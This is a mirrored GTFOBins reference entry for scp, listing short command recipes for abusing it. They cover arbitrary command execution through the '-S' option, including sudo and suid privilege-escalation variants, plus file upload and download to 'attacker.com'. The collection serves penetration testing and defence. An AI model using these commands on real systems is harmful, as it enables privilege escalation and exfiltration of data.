1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/scp.md
2018-05-24 21:05:11 +01:00

887 B

functions
exec-non-interactive sudo-enabled suid-limited upload download
code
TF=$(mktemp) CMD="touch /tmp/unrestricted" echo "$CMD" > "$TF" chmod +x "$TF" scp -S $TF x y:
code
TF=$(mktemp) CMD="touch /tmp/unrestricted" echo "$CMD" > "$TF" chmod +x "$TF" sudo scp -S $TF x y:
code
TF=$(mktemp) CMD="touch /tmp/unrestricted" echo "$CMD" > "$TF" chmod +x "$TF" ./scp -S $TF a b:
description code
Send local file to a SSH server. RPATH=user@attacker.com:~/where_to_save LPATH=file_to_send scp $LFILE $RPATH
description code
Fetch a remote file from a SSH server. RPATH=user@attacker.com:~/file_to_get LFILE=where_to_save scp $RPATH $LFILE